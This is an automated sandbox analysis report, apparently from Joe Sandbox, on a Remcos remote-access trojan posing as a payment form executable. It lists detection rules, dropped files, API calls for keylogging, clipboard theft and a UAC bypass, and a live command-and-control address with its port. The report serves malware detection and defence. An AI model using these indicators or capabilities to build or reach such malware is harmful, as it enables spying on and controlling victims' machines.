              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 7388, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\ProgramData\AppUpdate\remcos.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: Payment Transfer Request Form.bat.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,9_2_004315EC
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a0eb0d4b-5
              Source: Payment Transfer Request Form.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Payment Transfer Request Form.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041A01B
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040B28E
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040838E
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004087A0
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00407848
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004068CD FindFirstFileW,FindNextFileW,9_2_004068CD
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0044BA59 FindFirstFileExA,9_2_0044BA59
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040AA71
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00417AAB
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040AC78
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00406D28

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 4x nop then jmp 06A9AE4Eh0_2_06A9B437
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 4x nop then jmp 0776A3DEh15_2_0776A9C7
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 4x nop then jmp 074CA0E6h24_2_074CA6CF
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 4x nop then jmp 0721A0E6h29_2_0721A6CF
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 4x nop then jmp 074EA0E6h33_2_074EA6CF

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49754 -> 212.162.149.226:9285
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 149.226
              Source: global trafficTCP traffic: 192.168.2.9:49754 -> 212.162.149.226:9285
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49761 -> 178.237.33.50:80
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.226
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,9_2_0041936B
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
              Source: Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/PU
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/_IDENTIFIER=Intel64
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/iv
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, Payment Transfer Request Form.bat.exe, 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: remcos.exe, 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
              Source: remcos.exe, 00000017.00000002.3782308386.000000000151F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpal
              Source: Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1414846976.000000000282C000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 0000000F.00000002.1535563914.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 00000018.00000002.1598556738.000000000319F000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 0000001D.00000002.1679679015.0000000002F1F000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 00000021.00000002.1760390363.00000000030DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drString found in binary or memory: http://tempuri.org/ianiDataSet.xsd
              Source: Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drString found in binary or memory: http://tempuri.org/ianiDataSet1.xsd
              Source: Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drString found in binary or memory: http://tempuri.org/ianiDataSet2.xsdM
              Source: Payment Transfer Request Form.bat.exe, remcos.exe.9.dr, iKgKaogJ.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to register a low level keyboard hook
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00409340 SetWindowsHookExA 0000000D,0040932C,000000009_2_00409340
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040A65A
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_00414EC1
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040A65A
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,9_2_00409468

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000024.00000002.1736773927.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.1656887776.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1407344012.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.1574639451.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 7380, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 8156, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 2508, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3248, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 7388, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Contains functionalty to change the wallpaper
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0041A76C SystemParametersInfoW,9_2_0041A76C

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 4072, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 7380, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: Payment Transfer Request Form.bat.exe
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,9_2_00414DB4
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_026046070_2_02604607
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_0260D51C0_2_0260D51C
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A9CB080_2_06A9CB08
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A956F00_2_06A956F0
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A952B80_2_06A952B8
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A972680_2_06A97268
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A94E800_2_06A94E80
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A95B280_2_06A95B28
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A95B270_2_06A95B27
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004251529_2_00425152
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004352869_2_00435286
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004513D49_2_004513D4
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0045050B9_2_0045050B
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004365109_2_00436510
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004316FB9_2_004316FB
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0043569E9_2_0043569E
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004437009_2_00443700
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004257FB9_2_004257FB
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004128E39_2_004128E3
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004259649_2_00425964
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0041B9179_2_0041B917
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0043D9CC9_2_0043D9CC
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00435AD39_2_00435AD3
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00424BC39_2_00424BC3
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0043DBFB9_2_0043DBFB
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0044ABA99_2_0044ABA9
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00433C0B9_2_00433C0B
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00434D8A9_2_00434D8A
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0043DE2A9_2_0043DE2A
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0041CEAF9_2_0041CEAF
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00435F089_2_00435F08
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeCode function: 11_2_016BD51C11_2_016BD51C
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeCode function: 11_2_0753940811_2_07539408
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeCode function: 11_2_0753726811_2_07537268
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeCode function: 11_2_07534E8011_2_07534E80
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeCode function: 11_2_07535B1911_2_07535B19
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeCode function: 11_2_07535B2811_2_07535B28
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_0141D51C15_2_0141D51C
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_0776C08115_2_0776C081
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_077656F015_2_077656F0
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_0776726815_2_07767268
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_077652B815_2_077652B8
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_07764E8015_2_07764E80
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_07765B2815_2_07765B28
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_07765B1815_2_07765B18
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_015AD51C24_2_015AD51C
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074CBD9924_2_074CBD99
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C56F024_2_074C56F0
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C726824_2_074C7268
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C52B824_2_074C52B8
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C4E8024_2_074C4E80
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C5B2824_2_074C5B28
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C5B2724_2_074C5B27
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_02D3D51C29_2_02D3D51C
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_0721BDA829_2_0721BDA8
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_07214E8029_2_07214E80
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_072156F029_2_072156F0
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_072104C829_2_072104C8
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_07215B2829_2_07215B28
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_07215B1929_2_07215B19
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_0721726829_2_07217268
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 29_2_072152B829_2_072152B8
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_0132D51C33_2_0132D51C
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_03006BE033_2_03006BE0
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_0300000733_2_03000007
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_0300004033_2_03000040
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_03006BD833_2_03006BD8
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_074EBD5B33_2_074EBD5B
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_074E56F033_2_074E56F0
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_074E4E8033_2_074E4E80
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_074E5B1933_2_074E5B19
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_074E5B2833_2_074E5B28
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_074E726833_2_074E7268
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 33_2_074E52B833_2_074E52B8
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: String function: 00402073 appears 51 times
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: String function: 00432B90 appears 53 times
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: String function: 00432525 appears 41 times
              Source: Payment Transfer Request Form.bat.exeStatic PE information: invalid certificate
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1429283409.0000000006E30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000000.1322690850.00000000001B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameseEd.exe4 vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1413438857.000000000072E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1429762645.0000000007537000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameseEd.exe4 vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1428203129.0000000004F80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exe, 00000000.00000002.1417981546.00000000038FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exe, 00000009.00000002.1407344012.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exe, 00000009.00000002.1407344012.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exeBinary or memory string: OriginalFilenameseEd.exe4 vs Payment Transfer Request Form.bat.exe
              Source: Payment Transfer Request Form.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
